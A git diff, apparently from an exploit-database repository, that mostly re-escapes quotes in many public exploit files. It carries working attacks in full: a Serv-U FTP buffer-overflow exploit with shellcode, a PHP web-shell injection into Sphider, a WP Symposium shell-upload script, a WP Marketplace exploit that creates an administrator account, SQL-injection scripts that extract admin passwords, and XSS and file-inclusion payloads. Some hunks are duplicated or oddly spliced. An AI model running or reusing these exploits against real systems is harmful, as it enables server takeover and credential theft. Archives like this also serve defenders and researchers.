   addr.sin_port = htons(atoi(argv[2]));
   addr.sin_addr.s_addr = inet_addr(argv[1]);
 
-  printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
+  printf(\"\\n[+] Connecting to %s:%s...\\n\", argv[1], argv[2]);
   if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
-    perror("Socket creation failed");
+    perror(\"Socket creation failed\");
     exit(-1);
   }
   if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
-    perror("Connection failed");
+    perror(\"Connection failed\");
     exit(-1);
   }
-  FILEsock = fdopen(sock, "r");
-  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
-  if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
-    printf("[-] This is not a Serv-U v4.X ftp server.\n");
+  FILEsock = fdopen(sock, \"r\");
+  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  if (strstr(inbuffer, \"220 Serv-U FTP Server v4.\") != inbuffer) {
+    printf(\"[-] This is not a Serv-U v4.X ftp server.\\n\");
     exit(-1);
   }
-  if (strstr(inbuffer, "v4.1") > 0) {
+  if (strstr(inbuffer, \"v4.1\") > 0) {
     retaddress = retaddress_4103;
-    version = "4.1.0.3";
+    version = \"4.1.0.3\";
   }
 
-  printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
-  send_command("USER", argv[3]);
-  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
-  send_command("PASS", argv[4]);
-  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
-  if (strstr(inbuffer, "230") != inbuffer) {
-    printf("[-] Login failed.\n");
+  printf(\"\\n[+] Login in as %s:%s...\\n\", argv[3], argv[4]);
+  send_command(\"USER\", argv[3]);
+  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  send_command(\"PASS\", argv[4]);
+  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  if (strstr(inbuffer, \"230\") != inbuffer) {
+    printf(\"[-] Login failed.\\n\");
     exit(-1);
   }
 
   if (argv[5]) {
-    printf("\n[+] Changing directory...\n");
-    send_command("CD", argv[5]);
-    printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
+    printf(\"\\n[+] Changing directory...\\n\");
+    send_command(\"CD\", argv[5]);
+    printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
   }
 
   outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
   memset(outbuffer, NOP, exploit_length);
   memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));
 
-  printf("\n[+] Checking if \\xff doubling is nescesary: ");
-  send_command("SITE CHMOD 477", "-\xff\xff-");
+  printf(\"\\n[+] Checking if \\\\xff doubling is nescesary: \");
+  send_command(\"SITE CHMOD 477\", \"-\\xff\\xff-\");
   fgets(inbuffer, sizeof inbuffer, FILEsock);
-  if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
+  if (strchr(inbuffer, \'\\xff\') == strrchr(inbuffer, \'\\xff\')) {
     doubling = 1;
-    printf("Yes.");
+    printf(\"Yes.\");
     retaddress = retaddress_4004;
-    version = "4.0.0.4";
+    version = \"4.0.0.4\";
   } else {
-    printf("No.");
+    printf(\"No.\");
     if (retaddress==NULL) {
       retaddress = retaddress_4100;
-      version = "4.1.0.0";
+      version = \"4.1.0.0\";
     }
   }
-  printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
+  printf(\"\\n[+] Serv-U FTP server version %s: using retaddress 0x%08x\",
                       version, *(int*)retaddress);
   memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
   memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));
 
-  printf("\n[+] Sending exploit... ");
-  send_command("SITE CHMOD 477", outbuffer);
-  printf("send, you can now try to connect to %s:28876.\n", argv[1]);
-  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
+  printf(\"\\n[+] Sending exploit... \");
+  send_command(\"SITE CHMOD 477\", outbuffer);
+  printf(\"send, you can now try to connect to %s:28876.\\n\", argv[1]);
+  printf(\"    --> %s\", fgets(inbuffer, sizeof inbuffer, FILEsock));
   close(socket);
-  printf("\n[+] Done. \n");
+  printf(\"\\n[+] Done. \\n\");
 }
 
 
diff --git a/platforms/windows/remote/9998.c b/platforms/windows/remote/9998.c
index 7c3cea9cc..3bb0800fc 100755
--- a/platforms/windows/remote/9998.c
+++ b/platforms/windows/remote/9998.c
@@ -43,32 +43,32 @@ FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
 
 char *xpl;
 char *str;
-char message[]="This is a BulletProof FTP Client Session-File and should not be modified directly.\n";
-char trash[]="21\nanything\nbpfdhjomeepehepbflql\nC:\\\n/";
+char message[]=\"This is a BulletProof FTP Client Session-File and should not be modified directly.\\n\";
+char trash[]=\"21\\nanything\\nbpfdhjomeepehepbflql\\nC:\\\\\\n/\";
 
 int main(){
     int tam;
     FILE *fp;
-    printf("Made by: Rafael Sousa\n");
-    printf("Produzido por Rafael Sousa\n");
+    printf(\"Made by: Rafael Sousa\\n\");
+    printf(\"Produzido por Rafael Sousa\\n\");
 
 int main(){
     int tam;
     FILE *fp;
-    printf("Made by: Rafael Sousa\n");
-    printf("Produzido por Rafael Sousa\n");
+    printf(\"Made by: Rafael Sousa\\n\");
+    printf(\"Produzido por Rafael Sousa\\n\");
     str=(char *)malloc(98*sizeof(char));
-    memset(str,'a',93);
-    str[93]='b';
-    str[94]='c';
-    str[95]='d';
-    str[96]='e';
-    str[97]='\0';
+    memset(str,\'a\',93);
+    str[93]=\'b\';
+    str[94]=\'c\';
+    str[95]=\'d\';
+    str[96]=\'e\';
+    str[97]=\'\\0\';
     tam=strlen(str)+strlen(message)+strlen(trash);
-    printf("%d\n",tam);
+    printf(\"%d\\n\",tam);
     xpl=(char *)malloc((tam+1)*sizeof(char));
-    sprintf(xpl,"%s%s\n%s",message,str,trash);
-    fp=fopen("POC.bps","w");
+    sprintf(xpl,\"%s%s\\n%s\",message,str,trash);
+    fp=fopen(\"POC.bps\",\"w\");
     fputs(xpl,fp);
     fclose(fp);
     free(str);
5.5.35-0+wheezy1 +
5.5.35-0+wheezy1 [cid:image001.jpg@01CFAA73.0B6B8330] @@ -24,13 +24,13 @@ Response: # Exploit Title: Sphider 1.3.6 or later PHP Injection Description: -An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of "conf.php file". However during the installation the user is advised to change the permissions of "conf.php" file to chmod 666. +An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of \"conf.php file\". However during the installation the user is advised to change the permissions of \"conf.php\" file to chmod 666. Proof of Concept: Request: POST /admin/admin.php f=settings&Submit=1&_version_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_print_results=1&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100;system($_POST[cmd])&_index_numbers=1&_index_meta_keywords=1&_pdftotext_path=c%3A%5Ctemp%5Cpdftotext.exe&_catdoc_path=c%3A%5Ctemp%5Ccatdoc.exe&_xls2csv_path=c%3A%5Ctemp%5Cxls2csv&_catppt_path=c%3A%5Ctemp%5Ccatppt&_user_agent=Sphider&_min_delay=0&_strip_sessids=1&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_show_meta_description=1&_show_query_scores=1&_show_categories=1&_desc_length=250&_did_you_mean_enabled=1&_suggest_enabled=1&_suggest_history=1&_suggest_rows=10&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5 -"system($_POST[cmd])" has been injected. +\"system($_POST[cmd])\" has been injected. Request: POST http://URL/sphider/settings/conf.php cmd=pwd @@ -49,7 +49,7 @@ Request: POST /admin/admin.php f=7&parent=&category= Response - + @@ -57,10 +57,10 @@ Response Reflected XSS: Request: POST /sphider/admin/admin.php -f=index&adv=1&url="/> +f=index&adv=1&url=\"/> Response: - + diff --git a/platforms/php/webapps/35336.txt b/platforms/php/webapps/35336.txt index a6cae2f1b..e174f5937 100755 --- a/platforms/php/webapps/35336.txt +++ b/platforms/php/webapps/35336.txt @@ -6,26 +6,26 @@ An attacker may leverage these issues to execute arbitrary script code in the br TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. - + - + - + - + - + - + - + \' /> - + \' /> - + \' /> - + -

Exploit!

 +

Exploit!

 diff --git a/platforms/php/webapps/35338.txt b/platforms/php/webapps/35338.txt index a8b24fee9..7323791d0 100755 --- a/platforms/php/webapps/35338.txt +++ b/platforms/php/webapps/35338.txt @@ -8,7 +8,7 @@ TaskFreak! 0.6.4 is vulnerable; other versions may also be affected. GET /taskfreak/rss.php HTTP/1.1 -Referer: ">Waddup! +Referer: \">Waddup! User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) diff --git a/platforms/php/webapps/35543.txt b/platforms/php/webapps/35543.txt index 2b887992e..9977c97e1 100755 --- a/platforms/php/webapps/35543.txt +++ b/platforms/php/webapps/35543.txt @@ -19,39 +19,39 @@ # # -------------------------------------------------------------------- # -# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected: +# The upload function located on \"/wp-symposium/server/file_upload_form.php \" is protected: # -# if ($_FILES["file"]["error"] > 0) { -# echo "Error: " . $_FILES["file"]["error"] . "
"; +# if ($_FILES[\"file\"][\"error\"] > 0) { +# echo \"Error: \" . $_FILES[\"file\"][\"error\"] . \"
\"; # } else { -# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext'); -# //echo "Upload: " . $_FILES["file"]["name"] . "
"; -# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION); -# //echo "Extension: " . $ext . "
"; +# $allowedExts = \',\'.get_option(WPS_OPTIONS_PREFIX.\'_image_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_doc_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_video_ext\'); +# //echo \"Upload: \" . $_FILES[\"file\"][\"name\"] . \"
\"; +# $ext = pathinfo($_FILES[\"file\"][\"name\"], PATHINFO_EXTENSION); +# //echo \"Extension: \" . $ext . \"
\"; # if (strpos($allowedExts, $ext)) { # $extAllowed = true; # } else { # $extAllowed = false; # } -# //echo "Type: " . $_FILES["file"]["type"] . "
"; -# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB
"; -# //echo "Stored in: " . $_FILES["file"]["tmp_name"]; +# //echo \"Type: \" . $_FILES[\"file\"][\"type\"] . \"
\"; +# //echo \"Size: \" . ($_FILES[\"file\"][\"size\"] / 1024) . \" kB
\"; +# //echo \"Stored in: \" . $_FILES[\"file\"][\"tmp_name\"]; # # if (!$extAllowed) { -# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN); +# echo __(\'Sorry, file type not allowed.\', WPS_TEXT_DOMAIN); # } else { # // Copy file to tmp location # ... # ... # ... # -# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension +# BUTTTTT \"/wp-symposium/server/php/index.php\" is not protected and \"/wp-symposium/server/php/UploadHandler.php\" allow any extension # -# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/" +# The same vulnerable files are locate in \"/wp-symposium/mobile-files/server/php/\" # # --------------------------------------------------------------------- # -# Dork google: index of "wp-symposium" +# Dork google: index of \"wp-symposium\" # # # Tested on BackBox 3.x with python 2.6 @@ -69,8 +69,8 @@ import os, os.path, mimetypes # Check url def checkurl(url): - if url[:8] != "https://" and url[:7] != "http://": - print('[X] You must insert http:// or https:// procotol') + if url[:8] != \"https://\" and url[:7] != \"http://\": + print(\'[X] You must insert http:// or https:// procotol\') sys.exit(1) else: return url @@ -78,62 +78,62 @@ def checkurl(url): # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): - print '[X] '+file+' file is missing or not readable' + print \'[X] \'+file+\' file is missing or not readable\' sys.exit(1) else: return file -# Get file's mimetype +# Get file\'s mimetype def get_content_type(filename): - return mimetypes.guess_type(filename)[0] or 'application/octet-stream' + return mimetypes.guess_type(filename)[0] or \'application/octet-stream\' def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): - return ''.join(random.choice(chars) for _ in range(size)) + return \'\'.join(random.choice(chars) for _ in range(size)) # Create multipart header def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName): getfields = dict() - getfields['uploader_uid'] = '1' - getfields['uploader_dir'] = './'+randDirName - getfields['uploader_url'] = url_symposium_upload + getfields[\'uploader_uid\'] = \'1\' + getfields[\'uploader_dir\'] = \'./\'+randDirName + getfields[\'uploader_url\'] = url_symposium_upload payloadcontent = open(payloadname).read() - LIMIT = '----------lImIt_of_THE_fIle_eW_$' - CRLF = '\r\n' + LIMIT = \'----------lImIt_of_THE_fIle_eW_$\' + CRLF = \'\\r\\n\' L = [] for (key, value) in getfields.items(): - L.append('--' + LIMIT) - L.append('Content-Disposition: form-data; name="%s"' % key) - L.append('') + L.append(\'--\' + LIMIT) + L.append(\'Content-Disposition: form-data; name=\"%s\"\' % key) + L.append(\'\') L.append(value) - L.append('--' + LIMIT) - L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php")) - L.append('Content-Type: %s' % get_content_type(payloadname)) - L.append('') + L.append(\'--\' + LIMIT) + L.append(\'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\' % (\'files[]\', randShellName+\".php\")) + L.append(\'Content-Type: %s\' % get_content_type(payloadname)) + L.append(\'\') L.append(payloadcontent) - L.append('--' + LIMIT + '--') - L.append('') + L.append(\'--\' + LIMIT + \'--\') + L.append(\'\') body = CRLF.join(L) return body -banner = """ +banner = \"\"\" ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| - |. / \ |_____|__| |_____| __|__| |_____|_____|_____| + |. / \\ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | - `--- ---' + `--- ---\' ___ ___ _______ _______ __ | Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------. |. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | | - |. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__| + |. / \\ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__| |: |: | |: 1 |_____| |__| |::.|:. |::.| |::.. . | - `--- ---`---' `-------' + `--- ---`---\' `-------\' Wp-Symposium Sh311 Upl04d Vuln3r4b1l1ty v14.11 @@ -151,17 +151,17 @@ banner = """ https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww -""" +\"\"\" -commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]') -commandList.add_option('-t', '--target', action="store", - help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", +commandList = optparse.OptionParser(\'usage: %prog -t URL -f FILENAME.PHP [--timeout sec]\') +commandList.add_option(\'-t\', \'--target\', action=\"store\", + help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\", ) -commandList.add_option('-f', '--file', action="store", - help="Insert file name, ex: shell.php", +commandList.add_option(\'-f\', \'--file\', action=\"store\", + help=\"Insert file name, ex: shell.php\", ) -commandList.add_option('--timeout', action="store", default=10, type="int", - help="[Timeout Value] - Default 10", +commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\", + help=\"[Timeout Value] - Default 10\", ) options, remainder = commandList.parse_args() @@ -180,31 +180,31 @@ print(banner) socket.setdefaulttimeout(timeout) -url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/' +url_symposium_upload = host+\'/wp-content/plugins/wp-symposium/server/php/\' -content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$' +content_type = \'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$\' randDirName = id_generator() randShellName = id_generator() bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName) -headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', - 'content-type': content_type, - 'content-length': str(len(bodyupload)) } +headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\', + \'content-type\': content_type, + \'content-length\': str(len(bodyupload)) } try: - req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers) + req = urllib2.Request(url_symposium_upload+\'index.php\', bodyupload, headers) response = urllib2.urlopen(req) read = response.read() - if "error" in read or read == "0" or read == "": - print("[X] Upload Failed :(") + if \"error\" in read or read == \"0\" or read == \"\": + print(\"[X] Upload Failed :(\") else: - print("[!] Shell Uploaded") - print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n") + print(\"[!] Shell Uploaded\") + print(\"[!] Location: \"+url_symposium_upload+randDirName+randShellName+\".php\\n\") except urllib2.HTTPError as e: - print("[X] "+str(e)) + print(\"[X] \"+str(e)) except urllib2.URLError as e: - print("[X] Connection Error: "+str(e)) + print(\"[X] Connection Error: \"+str(e)) diff --git a/platforms/php/webapps/36490.py b/platforms/php/webapps/36490.py index 8c5ace501..74c6e0bfc 100755 --- a/platforms/php/webapps/36490.py +++ b/platforms/php/webapps/36490.py @@ -10,14 +10,14 @@ # # -------------------------------------------------------------------- # -# The vulnerable function is located on "wpmarketplace/libs/cart.php" file: +# The vulnerable function is located on \"wpmarketplace/libs/cart.php\" file: # # function ajaxinit(){ -# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ -# if(function_exists($_POST['execute'])) -# call_user_func($_POST['execute'],$_POST); +# if(isset($_POST[\'action\']) && $_POST[\'action\']==\'wpmp_pp_ajax_call\'){ +# if(function_exists($_POST[\'execute\'])) +# call_user_func($_POST[\'execute\'],$_POST); # else -# echo __("function not defined!","wpmarketplace"); +# echo __(\"function not defined!\",\"wpmarketplace\"); # die(); # } #} @@ -25,8 +25,8 @@ # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). # wpmp_pp_ajax_call() call functions by call_user_func() through POST data: # -# if (function_exists($_POST['execute'])) -# call_user_func($_POST['execute'], $_POST); +# if (function_exists($_POST[\'execute\'])) +# call_user_func($_POST[\'execute\'], $_POST); # else # ... # ... @@ -61,7 +61,7 @@ # # --------------------------------------------------------------------- # -# Dork google: index of "wpmarketplace" +# Dork google: index of \"wpmarketplace\" # # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 # @@ -76,8 +76,8 @@ import optparse # Check url def checkurl(url): - if url[:8] != "https://" and url[:7] != "http://": - print('[X] You must insert http:// or https:// procotol') + if url[:8] != \"https://\" and url[:7] != \"http://\": + print(\'[X] You must insert http:// or https:// procotol\') sys.exit(1) else: return url @@ -85,29 +85,29 @@ def checkurl(url): # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): - print '[X] '+file+' file is missing or not readable' + print \'[X] \'+file+\' file is missing or not readable\' sys.exit(1) else: return file def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): - return ''.join(random.choice(chars) for _ in range(size)) + return \'\'.join(random.choice(chars) for _ in range(size)) -banner = """ +banner = \"\"\" ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| - |. / \ |_____|__| |_____| __|__| |_____|_____|_____| + |. / \\ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | - `--- ---' + `--- ---\' ___ ___ __ __ __ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. |. | _ | _| <| -__| _| _ | | _ | __| -__| - |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| + |. \\_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| |: | | |__| |::.|:. | - `--- ---' + `--- ---\' WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) @@ -126,14 +126,14 @@ banner = """ https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww -""" +\"\"\" -commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') -commandList.add_option('-t', '--target', action="store", - help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", +commandList = optparse.OptionParser(\'usage: %prog -t URL [--timeout sec]\') +commandList.add_option(\'-t\', \'--target\', action=\"store\", + help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\", ) -commandList.add_option('--timeout', action="store", default=10, type="int", - help="[Timeout Value] - Default 10", +commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\", + help=\"[Timeout Value] - Default 10\", ) options, remainder = commandList.parse_args() @@ -154,30 +154,30 @@ socket.setdefaulttimeout(timeout) username = id_generator() pwd = id_generator() -body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', - 'execute' : 'wp_insert_user', - 'user_login' : username, - 'user_pass' : pwd, - 'role' : 'administrator'}) +body = urllib.urlencode({\'action\' : \'wpmp_pp_ajax_call\', + \'execute\' : \'wp_insert_user\', + \'user_login\' : username, + \'user_pass\' : pwd, + \'role\' : \'administrator\'}) -headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} +headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\'} -print "[+] Tryng to connect to: "+host +print \"[+] Tryng to connect to: \"+host try: - req = urllib2.Request(host+"/", body, headers) + req = urllib2.Request(host+\"/\", body, headers) response = urllib2.urlopen(req) html = response.read() - if html == "": - print("[!] Account Added") - print("[!] Location: "+host+"/wp-login.php") - print("[!] Username: "+username) - print("[!] Password: "+pwd) + if html == \"\": + print(\"[!] Account Added\") + print(\"[!] Location: \"+host+\"/wp-login.php\") + print(\"[!] Username: \"+username) + print(\"[!] Password: \"+pwd) else: - print("[X] Exploitation Failed :(") + print(\"[X] Exploitation Failed :(\") except urllib2.HTTPError as e: - print("[X] "+str(e)) + print(\"[X] \"+str(e)) except urllib2.URLError as e: - print("[X] Connection Error: "+str(e)) + print(\"[X] Connection Error: \"+str(e)) diff --git a/platforms/php/webapps/3729.txt b/platforms/php/webapps/3729.txt index d34d3c752..44505bd89 100755 --- a/platforms/php/webapps/3729.txt +++ b/platforms/php/webapps/3729.txt @@ -1,8 +1,8 @@ . . . ._ | _. .|_ _. _.;_/ -[_)|(_]\_|[ )(_](_.| \.net +[_)|(_]\\_|[ )(_](_.| \\.net | ._| -"QDBlog v0.4 - MULTIPLE VULNERABILITIES" +\"QDBlog v0.4 - MULTIPLE VULNERABILITIES\" by Omni 1) Infos @@ -29,8 +29,8 @@ Team : Playhack.net Security [ authenticate.php Script - Line 7 - 9 ] -$sql = "SELECT permissions, username FROM $prefix"."auth WHERE username = '" . $_POST['username'] . "' AND password = -MD5('".$_POST['wordpass']."');"; +$sql = \"SELECT permissions, username FROM $prefix\".\"auth WHERE username = \'\" . $_POST[\'username\'] . \"\' AND password = +MD5(\'\".$_POST[\'wordpass\'].\"\');\"; $query = mysql_query($sql, $conn); @@ -42,7 +42,7 @@ properly sanitized before being used, so an attacker can inject SQL code and gai --- [ PoC ] --- =============== -Put in the username field (in login.php) a code like 1' OR '1' = '1' # and in the password filed what you want. +Put in the username field (in login.php) a code like 1\' OR \'1\' = \'1\' # and in the password filed what you want. Click.. login and.. have fun :D --- [ Local File Inclusion ] --- @@ -53,7 +53,7 @@ index.php as shown below: [ categories.php script - Line 2 ] -include("themes/$theme/cat_top.php"); +include(\"themes/$theme/cat_top.php\"); [ end index.php script ] @@ -67,9 +67,9 @@ http://remote_host/qdblog/categories.php?theme=../../../../../../../etc/passwd%0 Take again a look to categories.php: -in this file there is "an other vulnerability", File Traversal: +in this file there is \"an other vulnerability\", File Traversal: - Line 3 : $file1 = fopen("themes/$theme/cat_mid.html", "r"); + Line 3 : $file1 = fopen(\"themes/$theme/cat_mid.html\", \"r\"); diff --git a/platforms/php/webapps/40637.txt b/platforms/php/webapps/40637.txt new file mode 100755 index 000000000..64f1a846c --- /dev/null +++ b/platforms/php/webapps/40637.txt @@ -0,0 +1,40 @@ +Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa + +While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing + SetHandler application/x-httpd-php + +Usage + +Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution. + +$ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla + + @@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@ + @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@ + @@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@! + !@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@ + !!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@ + !!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!! + !!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!! +!!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: !:! :!: !:! :!: +::: : :: ::::: :: ::::: :: ::: :: :: ::: :: ::: :: ::: :: + : ::: : : : : : : : : : : : : : : : : : ::: + +[-] Getting token +[-] Creating user account +[-] Getting token for admin login +[-] Logging in to admin +[+] Admin Login Success! +[+] Getting media options +[+] Setting media options +[*] Uploading exploit.pht +[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht +[*] Calling exploit +[$] Exploit Successful! +[*] SUCCESS: http://localhost:8080/joomla + + +Full Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40637.zip diff --git a/platforms/php/webapps/4135.pl b/platforms/php/webapps/4135.pl index d848d25b1..0ba8a8cac 100755 --- a/platforms/php/webapps/4135.pl +++ b/platforms/php/webapps/4135.pl @@ -4,26 +4,26 @@ # require LWP::UserAgent; -print "# +print \"# # phpEventCalendar <= v0.2.3 SQL Injection Exploit # By Iron - ironwarez.info # Thanks to Silentz for the help :) # Greets to everyone at RootShell Security Group & dHack # # Example target url: http://www.target.com/phpeventcalendar/ -Target url?"; +Target url?\"; chomp($target=); -if($target !~ /^http:\/\//) +if($target !~ /^http:\\/\\//) { - $target = "http://".$target; + $target = \"http://\".$target; } -if($target !~ /\/$/) +if($target !~ /\\/$/) { - $target .= "/"; + $target .= \"/\"; } -print "User id to retrieve name/password from? (1 = admin)"; +print \"User id to retrieve name/password from? (1 = admin)\"; chomp($target_id=); -$target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id; +$target .= \"eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=\".$target_id; $ua = LWP::UserAgent->new; $ua->timeout(10); @@ -33,20 +33,20 @@ $response = $ua->get($target); if ($response->is_success) { - if($response->content =~ /(.*)<\/span>/i) + if($response->content =~ /(.*)<\\/span>/i) { ($username,$password) = split(/,/,$1); - print "Username: ".$username; - print "\nPassword: ".$password; + print \"Username: \".$username; + print \"\\nPassword: \".$password; } else { - print "\nUnable to retrieve username/password."; + print \"\\nUnable to retrieve username/password.\"; } } else { - die "Error: ".$response->status_line; + die \"Error: \".$response->status_line; } # milw0rm.com [2007-07-01] diff --git a/platforms/php/webapps/5696.pl b/platforms/php/webapps/5696.pl index 92cba4ac9..7b96f11f0 100755 --- a/platforms/php/webapps/5696.pl +++ b/platforms/php/webapps/5696.pl @@ -26,52 +26,52 @@ ######################################## #----------------------------------------------------------------------------# ######################################## -system("color 02"); -print "\t\t############################################################\n\n"; -print "\t\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\n\n"; -print "\t\t# by Stack #\n\n"; -print "\t\t############################################################\n\n"; +system(\"color 02\"); +print \"\\t\\t############################################################\\n\\n\"; +print \"\\t\\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\\n\\n\"; +print \"\\t\\t# by Stack #\\n\\n\"; +print \"\\t\\t############################################################\\n\\n\"; ######################################## #----------------------------------------------------------------------------# ######################################## use LWP::UserAgent; -die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; -system("color f"); +die \"Example: perl $0 http://victim.com/path/\\n\" unless @ARGV; +system(\"color f\"); ######################################## #----------------------------------------------------------------------------# ######################################## #the username of news manages -$user="username"; +$user=\"username\"; #the pasword of news manages -$pass="passwd"; +$pass=\"passwd\"; #the tables of news manages -$tab="booking_user"; -$fil="details_view.php"; -$varo="event_id"; +$tab=\"booking_user\"; +$fil=\"details_view.php\"; +$varo=\"event_id\"; ######################################## 